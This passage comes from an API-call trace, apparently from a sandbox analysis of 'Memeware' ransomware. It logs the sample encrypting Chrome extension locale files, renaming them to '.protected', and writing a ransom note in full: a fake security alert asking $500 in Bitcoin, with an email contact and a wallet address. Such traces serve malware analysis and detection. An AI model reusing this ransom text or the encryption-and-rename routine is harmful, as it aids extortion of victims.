HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\messages.json.protected")) returned 1 [0080.528] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.528] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.528] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\RESTORE_FILES.txt") returned 159 [0080.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.529] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.529] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.529] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.529] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.529] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.529] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.530] CloseHandle (hObject=0x164) returned 1 [0080.530] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.530] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0080.530] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0080.530] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0080.530] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0080.530] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0080.530] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id") returned 141 [0080.530] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0080.530] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0080.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\*") returned 143 [0080.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.530] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.530] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.530] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.530] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.530] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\.") returned 143 [0080.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.530] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.530] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.530] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.530] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.530] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.530] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\..") returned 144 [0080.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.530] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.530] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") returned 155 [0080.531] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.531] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.531] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.531] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.534] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") returned 155 [0080.534] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.534] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") returned 155 [0080.534] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.534] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json") returned 155 [0080.534] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.534] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.535] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.535] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.535] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.535] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.535] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.535] CloseHandle (hObject=0x168) returned 1 [0080.535] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.protected") returned 165 [0080.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.protected")) returned 1 [0080.536] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.536] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.536] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0080.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.536] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.536] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.537] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.537] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.537] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.537] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.537] CloseHandle (hObject=0x164) returned 1 [0080.537] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.537] lstrcmpiW (lpString1="is", lpString2="Windows") returned -1 [0080.537] lstrcmpiW (lpString1="is", lpString2="Program Files") returned -1 [0080.537] lstrcmpiW (lpString1="is", lpString2="Program Files (x86)") returned -1 [0080.537] lstrcmpiW (lpString1="is", lpString2="$Recycle.bin") returned 1 [0080.537] lstrcmpiW (lpString1="is", lpString2="System Volume Information") returned -1 [0080.537] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is") returned 141 [0080.537] lstrcmpW (lpString1="is", lpString2=".") returned 1 [0080.537] lstrcmpW (lpString1="is", lpString2="..") returned 1 [0080.537] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\*") returned 143 [0080.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.538] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.538] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.538] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.538] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.538] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.538] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\.") returned 143 [0080.538] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.538] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.538] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.538] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.538] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.538] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.538] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.538] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\..") returned 144 [0080.538] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.538] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.538] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.538] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.538] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") returned 155 [0080.538] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.538] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.538] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.538] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") returned 155 [0080.539] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") returned 155 [0080.539] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.539] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json") returned 155 [0080.539] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.539] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb2, lpOverlapped=0x0) returned 1 [0080.539] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.539] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb2, lpOverlapped=0x0) returned 1 [0080.540] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.540] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.540] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.540] CloseHandle (hObject=0x168) returned 1 [0080.540] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.protected") returned 165 [0080.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), 